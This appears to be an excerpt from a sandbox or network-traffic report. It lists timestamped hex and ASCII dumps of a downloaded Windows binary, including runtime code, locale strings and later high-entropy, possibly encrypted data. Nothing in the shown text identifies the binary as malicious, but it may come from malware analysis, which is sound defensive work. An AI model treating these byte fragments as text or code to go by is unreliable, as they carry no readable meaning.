                                                                                                                      2021-12-02 08:40:06 UTC80INData Raw: db 88 5d e7 c7 45 fc fe ff ff ff e8 3d 00 00 00 84 db 75 43 e8 d4 06 00 00 8b f0 83 3e 00 74 1f 56 e8 e4 f9 ff ff 59 84 c0 74 14 ff 75 0c 6a 02 ff 75 08 8b 36 8b ce ff 15 28 a3 03 10 ff d6 ff 05 84 e8 04 10 33 c0 40 eb 0f 8a 5d e7 ff 75 e3 e8 49 fa ff ff 59 c3 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 6a 07 e8 20 04 00 00 cc 6a 10 68 98 9f 04 10 e8 3c 05 00 00 a1 84 e8 04 10 85 c0 7f 04 33 c0 eb 69 48 a3 84 e8 04 10 33 ff 47 89 7d e4 83 65 fc 00 e8 b0 f7 ff ff 88 45 e0 89 7d fc 83 3d 40 e5 04 10 02 75 6b e8 67 f8 ff ff e8 0c 06 00 00 e8 62 06 00 00 83 25 40 e5 04 10 00 83 65 fc 00 e8 39 00 00 00 6a 00 ff 75 08 e8 e4 f9 ff ff 59 59 0f b6 f0 f7 de 1b f6 23 f7 89 75 e4 c7 45 fc fe ff ff ff e8 22 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f
                                                                                                                      Data Ascii: ]E=uC>tVYtuju6(3@]uIY3MdY_^[j jh<3iH3G}eE}=@ukgb%@e9juYY#uE"MdY_
                                                                                                                      2021-12-02 08:40:06 UTC96INData Raw: ff ff ff 74 15 83 ef 04 83 ee 04 8b 06 89 07 83 e9 04 f7 c1 fc ff ff ff 75 eb 85 c9 74 0f 83 ef 01 83 ee 01 8a 06 88 07 83 e9 01 75 f1 8b 44 24 0c 5e 5f c3 eb 03 cc cc cc 8b c6 83 e0 0f 85 c0 0f 85 e3 00 00 00 8b d1 83 e1 7f c1 ea 07 74 66 8d a4 24 00 00 00 00 8b ff 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 5f 8b d1 c1 ea 05 85 d2 74 21 8d 9b 00 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 8d 76 20 8d 7f 20 4a 75 e5 83 e1 1f 74 30 8b c1 c1 e9 02 74 0f 8b 16 89 17 83 c7 04 83 c6 04 83 e9 01 75 f1
                                                                                                                      Data Ascii: tutuD$^_tf$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJut_t!ooNOv Jut0tu
                                                                                                                      2021-12-02 08:40:06 UTC112INData Raw: 20 f7 6a 73 58 66 89 46 32 8d 7a 01 8a 0a 42 84 c9 75 f9 2b d7 b0 01 5f 89 56 38 5e 5b 8b e5 5d c3 8b ff 56 8b f1 57 ff 76 2c 0f b6 46 31 8d 7e 40 50 ff 76 04 ff 36 e8 2b e9 ff ff 83 c4 10 84 c0 74 39 83 46 14 04 8b 46 14 53 8b 9f 04 04 00 00 0f b7 40 fc 85 db 75 02 8b df 50 8b cf e8 d4 e7 ff ff 50 8d 46 38 53 50 e8 d4 bb 00 00 83 c4 10 5b 85 c0 74 25 c6 46 30 01 eb 1f 8b 8f 04 04 00 00 85 c9 75 02 8b cf 83 46 14 04 8b 46 14 8a 40 fc 88 01 c7 46 38 01 00 00 00 8b 87 04 04 00 00 85 c0 74 02 8b f8 89 7e 34 b0 01 5f 5e c2 04 00 8b ff 55 8b ec 51 53 56 8b f1 57 c6 46 3c 01 8d 7e 40 83 46 14 04 8b 46 14 ff 76 2c 0f b7 58 fc 0f b7 46 32 50 ff 76 04 ff 36 e8 b8 e8 ff ff 83 c4 10 84 c0 75 32 8b 8f 04 04 00 00 88 5d fc 88 45 fd 85 c9 75 02 8b cf 8b 46 08 50 8b 00
                                                                                                                      Data Ascii: jsXfF2zBu+_V8^[]VWv,F1~@Pv6+t9FFS@uPPF8SP[t%F0uFF@F8t~4_^UQSVWF<~@FFv,XF2Pv6u2]EuFP
                                                                                                                      2021-12-02 08:40:06 UTC128INData Raw: 8b 3c 8d e4 c8 03 10 85 ff 0f 85 88 00 00 00 33 c0 50 89 85 d0 f4 ff ff 89 85 2c fe ff ff 8d 85 d4 f4 ff ff 50 8d 85 30 fe ff ff 68 cc 01 00 00 50 e8 c9 25 00 00 83 c4 10 8b 9d 2c fe ff ff 89 9d e8 f6 ff ff 85 db 0f 85 ec 00 00 00 33 c9 e9 05 01 00 00 33 c0 50 89 85 d0 f4 ff ff 89 85 2c fe ff ff 8d 85 d4 f4 ff ff 50 8d 85 30 fe ff ff 68 cc 01 00 00 50 e8 84 25 00 00 83 c4 10 32 c0 e9 45 ff ff ff 83 a5 d0 f4 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 64 83 ff 01 74 a9 85 db 74 ad 33 f6 33 c9 8b c7 f7 a4 8d 30 fe ff ff 03 c6 89 84 8d 30 fe ff ff 83 d2 00 41 8b f2 3b cb 75 e4 85 f6 0f 84 71 ff ff ff 8b 85 2c fe ff ff 83 f8 73 73 19 89 b4 85 30 fe ff ff 8b 9d 2c fe ff ff 43 89 9d 2c fe ff ff e9 53 ff ff ff 33 c0 89 85 d0 f4 ff ff 89 85 2c fe ff ff 50 8d 85 d4 f4
                                                                                                                      Data Ascii: <3P,P0hP%,33P,P0hP%2E,jdtt3300A;uq,ss0,C,S3,P
                                                                                                                      2021-12-02 08:40:06 UTC144INData Raw: 4d 08 75 05 33 c0 66 89 02 85 ff 5f 75 a3 83 fe ff 75 12 8b 45 0c 33 d2 6a 50 66 89 54 41 fe 58 e9 74 ff ff ff 33 c0 66 89 01 e8 96 00 00 00 6a 22 e9 59 ff ff ff 8b ff 55 8b ec 5d e9 2a ff ff ff 8b ff 55 8b ec 5d e9 69 38 00 00 8b ff 55 8b ec 8b 4d 08 33 c0 3b 0c c5 78 cb 03 10 74 27 40 83 f8 2d 72 f1 8d 41 ed 83 f8 11 77 05 6a 0d 58 5d c3 8d 81 44 ff ff ff 6a 0e 59 3b c8 1b c0 23 c1 83 c0 08 5d c3 8b 04 c5 7c cb 03 10 5d c3 8b ff 55 8b ec 56 e8 18 00 00 00 8b 4d 08 51 89 08 e8 a7 ff ff ff 59 8b f0 e8 18 00 00 00 89 30 5e 5d c3 e8 45 40 00 00 85 c0 75 06 b8 b4 d0 04 10 c3 83 c0 14 c3 e8 32 40 00 00 85 c0 75 06 b8 b0 d0 04 10 c3 83 c0 10 c3 8b ff 55 8b ec 53 56 57 8b 7d 08 85 ff 74 13 8b 4d 0c 85 c9 74 0c 8b 5d 10 85 db 75 1b 33 c0 66 89 07 e8 c6 ff ff ff
                                                                                                                      Data Ascii: Mu3f_uuE3jPfTAXt3fj"YU]*U]i8UM3;xt'@-rAwjX]DjY;#]|]UVMQY0^]E@u2@uUSVW}tMt]u3f
                                                                                                                      2021-12-02 08:40:06 UTC160INData Raw: 10 e8 22 44 00 00 53 e8 6f f8 ff ff 59 eb c0 57 ff 35 80 d1 04 10 e8 0d 44 00 00 85 c0 75 11 33 db 53 ff 35 80 d1 04 10 e8 fb 43 00 00 57 eb d7 68 20 ef 04 10 57 e8 68 fd ff ff 6a 00 e8 39 f8 ff ff 83 c4 0c 8b df 56 ff 15 e0 a0 03 10 f7 df 1b ff 23 fb 74 06 8b c7 5f 5e 5b c3 e8 a1 f0 ff ff cc a1 80 d1 04 10 56 83 f8 ff 74 18 50 e8 76 43 00 00 8b f0 85 f6 74 07 83 fe ff 74 78 eb 6e a1 80 d1 04 10 6a ff 50 e8 9b 43 00 00 85 c0 74 65 68 64 03 00 00 6a 01 e8 92 29 00 00 8b f0 59 59 85 f6 75 15 50 ff 35 80 d1 04 10 e8 77 43 00 00 56 e8 c4 f7 ff ff 59 eb 3c 56 ff 35 80 d1 04 10 e8 62 43 00 00 85 c0 75 0f 50 ff 35 80 d1 04 10 e8 52 43 00 00 56 eb d9 68 20 ef 04 10 56 e8 bf fc ff ff 6a 00 e8 90 f7 ff ff 83 c4 0c 85 f6 74 04 8b c6 5e c3 e8 07 f0 ff ff cc 8b ff 53
                                                                                                                      Data Ascii: "DSoYW5Du3S5CWh Whj9V#t_^[VtPvCttxnjPCtehdj)YYuP5wCVY<V5bCuP5RCVh Vjt^S
                                                                                                                      2021-12-02 08:40:06 UTC176INData Raw: 0d 00 00 00 8b c6 e8 fe 85 fe ff c2 0c 00 8b 75 e4 8b 4d 10 ff 31 e8 ba 91 ff ff 59 c3 8b ff 55 8b ec 56 8b 35 08 d0 04 10 8b ce 33 35 30 f2 04 10 83 e1 1f 6a 00 6a 00 ff 75 08 d3 ce 8b ce ff 15 28 a3 03 10 ff d6 5e 5d c2 04 00 68 0c e4 03 10 68 08 e4 03 10 68 0c e4 03 10 6a 00 e8 d1 01 00 00 83 c4 10 c3 68 24 e4 03 10 68 1c e4 03 10 68 24 e4 03 10 6a 01 e8 b7 01 00 00 83 c4 10 c3 68 3c e4 03 10 68 34 e4 03 10 68 3c e4 03 10 6a 02 e8 9d 01 00 00 83 c4 10 c3 68 a4 e4 03 10 68 9c e4 03 10 68 a4 e4 03 10 6a 08 e8 83 01 00 00 83 c4 10 c3 68 bc e4 03 10 68 b4 e4 03 10 68 bc e4 03 10 6a 0b e8 69 01 00 00 83 c4 10 c3 68 d4 e4 03 10 68 cc e4 03 10 68 d4 e4 03 10 6a 0e e8 4f 01 00 00 83 c4 10 c3 68 ec e4 03 10 68 e4 e4 03 10 68 ec e4 03 10 6a 0f e8 35 01 00 00 83
                                                                                                                      Data Ascii: uM1YUV5350jju(^]hhhjh$hh$jh<h4h<jhhhjhhhjihhhjOhhhj5
                                                                                                                      2021-12-02 08:40:06 UTC192INData Raw: 7e f8 8b c8 25 ff ff ff 7f 3d 00 00 f0 7f 0f 82 72 02 00 00 0f 87 de 01 00 00 83 fa 00 0f 87 d5 01 00 00 e9 5e 02 00 00 b9 00 00 00 00 66 0f 57 c0 b8 f0 43 00 00 66 0f c4 c0 03 66 0f 12 3d e0 e5 03 10 66 0f 12 15 f0 e5 03 10 f2 0f 59 c4 66 0f 7e e2 66 0f 73 d4 20 66 0f 7e e0 83 fa 00 74 52 66 0f 54 f8 f2 0f 10 e0 66 0f 54 05 00 e6 03 10 66 0f 73 d0 2c 66 0f c5 c0 00 66 0f 56 fa 25 ff 00 00 00 83 c0 01 25 fe 01 00 00 f2 0f 59 3c 85 c8 15 04 10 66 0f 12 2c 85 c8 15 04 10 03 c0 66 0f 28 34 85 e0 19 04 10 ba 7f 3e 04 00 e9 5c fb ff ff 8b d0 81 e2 ff ff ff 7f 83 fa 00 75 a1 8b 54 24 10 81 e2 00 00 00 80 83 fa 00 74 31 c1 e1 0d 23 c1 ba 00 00 f0 7f 0b d0 66 0f 6e c2 66 0f 73 f0 20 66 0f 12 0d f0 e5 03 10 66 0f 12 54 24 04 f2 0f 5e ca ba 1b 00 00 00 e9 67 02 00
                                                                                                                      Data Ascii: ~%=r^fWCff=fYf~fs f~tRfTfTfs,ffV%%Y<f,f(4>\uT$t1#fnfs ffT$^g
                                                                                                                      2021-12-02 08:40:06 UTC208INData Raw: 00 00 59 8b d0 6a 01 68 7c 4c 03 10 89 56 5c ff 15 04 a1 03 10 8b 45 08 f6 00 04 75 02 89 18 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 4d 08 33 d2 0f b7 01 83 c1 02 66 83 f8 41 72 06 66 83 f8 5a 76 09 83 c0 9f 66 83 f8 19 77 03 42 eb e2 8b c2 5d c3 8b ff 55 8b ec 81 ec fc 00 00 00 a1 08 d0 04 10 33 c5 89 45 fc 53 56 8b 75 08 57 e8 35 3f ff ff 8b d8 e8 2e 3f ff ff 56 8b b8 4c 03 00 00 e8 f9 02 00 00 59 8b 4b 64 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 05 f0 ff ff 50 81 c1 02 10 00 00 51 56 ff 15 10 a1 03 10 83 a5 08 ff ff ff 00 85 c0 0f 84 d4 01 00 00 8d 85 0c ff ff ff 50 ff 73 54 e8 ff f5 fe ff 59 59 85 c0 0f 85 b5 00 00 00 6a 78 8d 85 0c ff ff ff 50 8b 43 60 f7 d8 1b c0 25 02 f0 ff ff 05 01 10 00 00 50 56 ff 15 10 a1 03 10 85 c0 0f 84 91 01 00 00 8d 85 0c
                                                                                                                      Data Ascii: Yjh|LV\Eu_^[]UM3fArfZvfwB]U3ESVuW5?.?VLYKdjxPQVPsTYYjxPC`%PV
                                                                                                                      2021-12-02 08:40:06 UTC224INData Raw: 8d 4d a8 e9 41 f3 fc ff 8d 4d 9c e9 39 f3 fc ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 94 33 c8 e8 61 b7 fd ff 8b 4a fc 33 c8 e8 57 b7 fd ff b8 e0 95 04 10 e9 82 f2 fd ff cc cc cc cc cc cc cc cc cc cc cc cc cc 8d 8d c8 fd ff ff e9 95 08 fd ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 98 fd ff ff 33 c8 e8 1a b7 fd ff 8b 4a f8 33 c8 e8 10 b7 fd ff b8 a8 96 04 10 e9 3b f2 fd ff cc cc cc cc cc cc 8d 4d dc e9 78 2a fd ff 8d 4d c0 e9 50 08 fd ff 8d 4d 98 e9 48 f4 fc ff 8d 4d e0 e9 60 2a fd ff 8d 4d d8 e9 e8 f1 fc ff 8d 4d e8 e9 50 2a fd ff 8d 4d b8 e9 d8 f1 fc ff 8d 4d e4 e9 40 2a fd ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 98 33 c8 e8 a8 b6 fd ff 8b 4a f8 33 c8 e8 9e b6 fd ff b8 d8 96 04 10 e9 c9 f1 fd ff cc cc cc cc 90 90 8b 54 24 08
                                                                                                                      Data Ascii: MAM9T$BJ3aJ3WT$B3J3;Mx*MPMHM`*MMP*MM@*T$BJ3J3T$
                                                                                                                      2021-12-02 08:40:06 UTC240INData Raw: af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 01 81 01 81 01 81 01 81 01 81 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                      Data Ascii: ((((( H
                                                                                                                      2021-12-02 08:40:06 UTC256INData Raw: 00 73 00 6d 00 6a 00 2d 00 6e 00 6f 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 73 00 65 00 00 00 00 00 73 00 6d 00 6e 00 2d 00 66 00 69 00 00 00 00 00 73 00 6d 00 73 00 2d 00 66 00 69 00 00 00 00 00 73 00 71 00 2d 00 61 00 6c 00 00 00 73 00 72 00 2d 00 62 00 61 00 2d 00 63 00 79 00 72 00 6c 00 00 00 00 00 73 00 72 00 2d 00 62 00 61 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 73 00 72 00 2d 00 73 00 70 00 2d 00 63 00 79 00 72 00 6c 00 00 00 00 00 73 00 72 00 2d 00 73 00 70 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 73 00 76 00 2d 00 66 00 69 00 00 00 73 00 76 00 2d 00 73 00 65 00 00 00 73 00 77 00 2d 00 6b 00 65 00 00 00 73 00 79 00 72 00 2d 00 73 00 79 00 00 00 00 00 74 00 61 00 2d 00 69 00 6e 00 00 00 74 00 65 00 2d 00 69 00 6e 00 00 00 74 00 68 00 2d 00
                                                                                                                      Data Ascii: smj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-
                                                                                                                      2021-12-02 08:40:06 UTC272INData Raw: 3f 00 00 00 00 00 c0 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 00 51 db 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 f0 e8 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 e0 80 da 3f 00 00 00 00 c0 1f da 3f 00 00 00 00 c0 1f da 3f 00 00 00 00 a0 be d9 3f 00 00 00 00 a0 be d9 3f 00 00 00 00 80 5d d9 3f 00 00 00 00 80 5d d9 3f 00 00 00 00 50 03 d9 3f 00 00 00 00 50 03 d9 3f 00 00 00 00 20 a9 d8 3f 00 00 00 00 20 a9 d8 3f 00 00 00 00 e0 55 d8 3f 00 00 00 00 e0 55 d8 3f 00 00 00 00 28 ff d7 3f 00 00 00 00 28 ff d7 3f 00 00 00 00 60 af d7 3f 00 00 00 00 60 af d7 3f 00 00 00 00 98 5f d7 3f 00 00 00 00 98 5f d7 3f 00 00 00 00 d0 0f d7 3f 00 00 00 00 d0 0f d7 3f 00 00 00 00 80 c3 d6 3f 00 00 00 00 80 c3 d6 3f 00 00 00 00 a8 7a d6 3f 00 00 00 00 a8 7a d6 3f 00 00 00 00 d0 31
                                                                                                                      Data Ascii: ??Q?Q?????????]?]?P?P? ? ?U?U?(?(?`?`?_?_?????z?z?1
                                                                                                                      2021-12-02 08:40:06 UTC288INData Raw: 00 ff ff ff ff 00 00 00 00 00 00 00 00 48 88 03 10 04 00 00 00 84 7e 01 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 50 88 03 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 08 00 00 00 58 88 03 10 08 00 00 00 6a 88 03 10 0e 00 00 00 72 88 03 10 0f 00 00 00 7a 88 03 10 0f 00 00 00 85 88 03 10 04 00 00 00 90 88 03 10 12 00 00 00 84 7e 01 10 12 00 00 00 98 88 03 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 14 00 00 00 a0 88 03 10 18 00 00 00 ab 88 03 10 19 00 00 00 b6 88 03 10 14 00 00 00 c4 88 03 10 1b 00 00 00 84 7e 01 10 14 00 00 00 84 7e 01 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 1b 00 00 00 84 7e 01 10 1b 00 00 00 84 7e
                                                                                                                      Data Ascii: H~PXjrz~~~~~
                                                                                                                      2021-12-02 08:40:06 UTC304INData Raw: 44 55 5f 4d 62 73 74 61 74 65 74 40 40 40 73 74 64 40 40 00 00 e4 a3 03 10 00 00 00 00 2e 3f 41 56 3f 24 6e 75 6d 70 75 6e 63 74 40 44 40 73 74 64 40 40 00 00 00 00 00 00 e4 a3 03 10 00 00 00 00 2e 3f 41 56 3f 24 6e 75 6d 5f 70 75 74 40 44 56 3f 24 6f 73 74 72 65 61 6d 62 75 66 5f 69 74 65 72 61 74 6f 72 40 44 55 3f 24 63 68 61 72 5f 74 72 61 69 74 73 40 44 40 73 74 64 40 40 40 73 74 64 40 40 40 73 74 64 40 40 00 00 00 e4 a3 03 10 00 00 00 00 2e 3f 41 56 3f 24 63 74 79 70 65 40 44 40 73 74 64 40 40 00 e4 a3 03 10 00 00 00 00 2e 3f 41 55 63 74 79 70 65 5f 62 61 73 65 40 73 74 64 40 40 00 00 00 00 e4 a3 03 10 00 00 00 00 2e 3f 41 56 66 61 63 65 74 40 6c 6f 63 61 6c 65 40 73 74 64 40 40 00 00 e4 a3 03 10 00 00 00 00 2e 3f 41 55 5f 43 72 74 5f 6e 65 77 5f 64
                                                                                                                      Data Ascii: DU_Mbstatet@@@std@@.?AV?$numpunct@D@std@@.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@.?AV?$ctype@D@std@@.?AUctype_base@std@@.?AVfacet@locale@std@@.?AU_Crt_new_d
                                                                                                                      2021-12-02 08:40:06 UTC320INData Raw: 5d a3 54 be 46 a1 3c 3b dd 81 29 d3 90 c3 56 be a3 6d ac b5 70 fd 54 58 28 c9 75 37 ac 0d 08 c9 1a c5 3e 7d 58 17 70 3e 28 29 88 e9 fa 11 b7 2e 6d 87 d4 be 28 29 4e 00 c4 7f ca eb fd 93 bd cf 0a 29 09 8d 3e f5 f9 51 26 5c d5 ca 0c 19 4f e6 2a 51 66 eb fd 93 19 e7 42 7d 01 8d 3e f5 8c db fd 93 ed 1b ab a0 4f 8d 3e ed a3 f9 2b a3 d5 ca 0c 01 b0 d3 7c ae 66 eb fd 8b 25 37 6c 0d a0 42 5e e1 25 58 28 90 86 37 6c 0d a0 48 6e e1 25 c0 28 63 57 79 ac 0d 2c c9 1a c5 a1 af 14 a3 d5 3a 0c 8d 88 c9 1a 9c 39 af d9 22 e0 9a 8c 29 88 c9 20 da c6 af 1e 27 70 12 28 29 88 81 19 99 0d c4 5d 87 f8 be 28 29 8f 90 70 cc 84 2b fd 0f 54 be 28 a8 3c ed b6 c5 0d af 8f 9b d5 bc ef 6d ac 89 1b 6e b6 af 58 e7 70 fe 6b fa 77 36 db a9 29 ef dc 28 10 9a 68 de 79 fa c8 4c 49 8b 99 22 20
                                                                                                                      Data Ascii: ]TF<;)VmpTX(u7>}Xp>().m()N)>Q&\O*QfB}>O>+|f%7lB^%X(7lHn%(cWy,:9") 'p()]()p+T(<mnXpkw6)(hyLI"
                                                                                                                      2021-12-02 08:40:06 UTC336INData Raw: 84 0d 08 c9 1a c5 0b 2e 6d 87 d4 be 28 29 ae 82 18 c5 ca eb fd cf 48 4e 89 29 49 a5 3e a9 05 2e ad 87 38 3f 56 28 88 0e 5e e1 4d 46 18 c7 54 d5 6c 0d c8 8a 93 81 29 ef 58 d7 70 fe 07 c6 7c 76 9b b1 29 ef d9 ff fe 1b ef 6d ac bd 67 64 d9 af 18 cf 70 ca 27 a8 fc ed 6e ff ce ab d9 64 10 9a 6c 84 6d b0 1a 44 49 8b 9d 43 fc be 28 a8 cc ed 5e 18 da af d9 22 20 9a 6c 7a 6f b3 1a 02 89 8b 49 a3 54 be 18 be b3 c9 9b 41 29 3f d9 a3 54 62 2c d6 77 48 ae e1 9d af d9 a3 5e a4 14 29 4f 8d 3e f1 dc 5c 32 a3 d5 f2 0c 1d 47 34 6a 61 8c db fd 97 78 96 e9 5d 49 a5 3e f1 0e 2e ad 87 60 47 d0 21 92 0e 5e e1 29 82 30 e9 54 3f 5c 0d ac a3 2b d7 1e 6e bd 87 70 ae a9 6d ac ed cf 0a f2 50 58 d7 70 9a 59 c4 c6 11 dd 81 29 83 49 77 c1 be a9 6d ac e5 be 4d 0d af 58 e7 70 92 c8 99 88
                                                                                                                      Data Ascii: .m()HN)I>.8?V(^MFTl)Xp|v)mgdp'ndlmDIC(^" lzoITA)?Tb,wH^)O>\2G4jax]I>.`G!^)0T?\+npmPXpY)IwmMXp
                                                                                                                      2021-12-02 08:40:06 UTC352INData Raw: 6e 83 8c 56 17 aa ff b1 27 ac d5 c8 1a c5 65 af 89 a1 44 41 5c 0d dc 42 4e e1 35 22 9d 87 20 35 64 0d b4 99 f2 ca ce af d9 28 84 3d ec 25 03 8d 3e a9 86 55 da 61 dd ea 0c 59 01 8d 3e ad b4 c6 64 6e 5a 57 5e d6 77 36 91 81 29 bb 52 e7 70 86 79 43 d0 93 f2 df a0 af d9 28 bc e7 ad c4 87 4d 2a c4 0d af 60 96 38 7b 21 a2 dc ed 7e 4e 49 8b b1 4a 18 41 d7 d6 02 8e 1b 4e 59 8b 8d 28 18 9a 14 a3 b7 43 45 c6 85 eb fd b0 de f9 2a 41 3c de 1a d5 85 eb fd b5 bc e6 60 28 88 36 6e e1 11 a0 6f 6c d9 eb 18 78 87 7f d1 4e fd a0 6f e7 70 a1 79 26 3e 85 3e e7 5c 50 ad 87 64 d4 38 d6 fc ed 46 93 f2 db fd cb ab ca 0c 61 03 45 3e 41 0d af d9 f3 bc 15 c5 29 88 9f e5 b1 29 d3 52 37 70 2a 28 29 88 42 96 e1 95 af d9 a3 bc a0 44 29 88 c6 ac 92 09 2c 1d 9b 5b 08 6f 2c ee 08 f8 cd 6b
                                                                                                                      Data Ascii: nV'eDA\BN5" 5d(=%>UaY>dnZW^w6)RpyC(M*`8{!~NIJANY(CE*A<`(6nolxNopy&>>\Pd8FaE>A))R7p*()BD),[o,k
                                                                                                                      2021-12-02 08:40:06 UTC368INData Raw: ad 87 34 41 5c 0d b0 42 8e e1 95 af d9 a3 df f2 0c 1d 60 cb 31 3a f2 2c 1d af 0b e0 a3 ec d5 92 9b 01 9d af d9 a3 97 eb a3 c5 0b 25 3a 93 5a 50 ac b7 df 4c d7 5c 98 36 6f c9 f2 da d1 f5 05 56 f6 54 77 36 dd 80 ed 5d 3d 04 54 33 55 cd bb 09 29 17 a6 c5 a2 fa 3e e4 83 82 4f 8c e2 01 f0 fc d9 28 11 46 df d8 d1 40 5f 3d 3e 7d 18 c6 ac b9 a9 5c 70 c0 91 3b ec 2e ac 5b d4 3a 84 c8 4f 8c ea ed 4a db d9 62 31 4e 27 a8 fd 39 fd 0b 96 8c 1e e6 a0 27 79 24 88 48 5f 31 5d f5 26 5c df fb dc de 79 a3 55 4c 48 5b ea 71 d5 cb dc dc d1 c6 1a 02 48 53 c3 df f1 be a9 64 74 16 3f 59 1c 2e 9c 5f 92 62 d7 d6 03 8c e6 9c fa 5e 5a 67 40 37 6d d5 09 bc e6 b5 18 94 d9 28 11 42 a3 6c 7c 42 5f 35 86 ea 21 cb 40 cf 8f 80 e0 ae 1b c5 0d c7 e9 3b 10 1c 79 c1 37 29 1a c5 8e 6b cd f5 ab
                                                                                                                      Data Ascii: 4A\B`1:,%:ZPL\6oVTw6]=T3U)>O(F@_=>}\p;.[:OJb1N'9'y$H_1]&\yULH[qHSdt?Y._b^Zg@7m(Bl|B_5!@;y7)k
                                                                                                                      2021-12-02 08:40:06 UTC384INData Raw: 56 47 88 c9 4c 3a 79 8b a5 28 c0 9a a0 29 88 c9 91 89 29 c3 31 57 b8 41 d7 aa 4c f1 a3 80 2f e2 d0 4a ac 43 d7 d6 77 bd 3e a5 f2 1b fd 37 54 be 28 d6 fc ed 6a 2d 1a 5f d9 a3 df 66 ab ed 84 4c c1 b1 07 16 13 af 63 bc c1 f8 75 36 e5 af 51 16 4c bb b0 b3 72 a8 71 5c 02 21 00 a0 5c 63 a9 41 d7 c2 9b 36 6e e1 7d 24 4d 87 c8 be 28 29 03 02 f2 a9 37 50 26 fa df 3a 0c 89 88 c9 1a 9a 53 f2 82 22 90 06 2e 29 88 0a 4f 4e e1 2c 35 b3 ab cb 20 7b d9 21 90 f8 f2 50 1e e6 a8 82 ed c4 88 fa c8 04 68 53 d0 c8 11 42 17 43 ea 90 99 01 05 26 9c 5f 95 db d4 21 09 bc e6 05 9e 2d ca 64 11 4a 48 f5 0a c9 9b 88 f9 b6 e0 2c 0a 35 6d dd 7f 38 72 8f 56 45 e9 2a 11 4a a9 5c 7c 05 72 35 0d 68 9c 5b c9 83 76 29 49 a4 e2 c1 8c da 21 f4 d4 65 d7 a8 fd 31 1e ca d7 50 1e e6 a4 de 82 56 88
                                                                                                                      Data Ascii: VGL:y())1WAL/JCw>7T(j-_fLcu6QLrq\!\cA6n}$M()7P&:S".)ON,5 {!PhSBC&_!-dJH,5m8rVE*J\|r5h[v)I!e1PV
                                                                                                                      2021-12-02 08:40:06 UTC400INData Raw: de e1 ca ea 31 a9 79 18 28 ee cd 3d 34 0c 95 af 18 c6 a0 b8 a9 6c 7c 75 91 c5 0d 2e ac 57 77 cd 1b 0f 4f 8c e6 dc 72 1e d9 c8 11 42 18 41 2f 09 4a 50 65 00 d8 a3 54 d6 89 61 4e e8 4b 4c 48 53 18 c6 a8 b2 a9 5c 74 a0 62 00 fb 2e ac 5f a1 d9 a4 a2 4f 8c ea b1 84 09 d9 22 21 4e 20 53 9f 4d 9b b0 fd dd 06 17 d0 79 6d d1 45 e9 58 c5 8c ea 21 fa cf 41 d7 a8 cd 31 16 92 0d af 58 d6 ac ea 92 60 88 42 5f 3d 86 ea 29 28 11 42 a3 6c 7c 21 3f a4 0d af 5a 67 40 41 5d 3d 77 bc 06 3a 78 bf 8f f4 ab 6e 77 77 03 2c 47 06 58 24 35 20 b8 9e d7 5c 84 36 6f cd 5f fe 31 c6 a9 40 d7 aa ed 21 1a f6 df 2c bc 4f 54 79 6d c9 56 f8 6c c5 ca ea 3d 53 6c 1d 28 ee cd 35 35 68 f8 af 58 ee a8 7d a9 d5 60 48 5f 39 87 72 d9 a3 df fb d4 43 ae 90 ed 34 67 ed 50 e6 a8 8d fa a8 fd 35 c1 ef 28
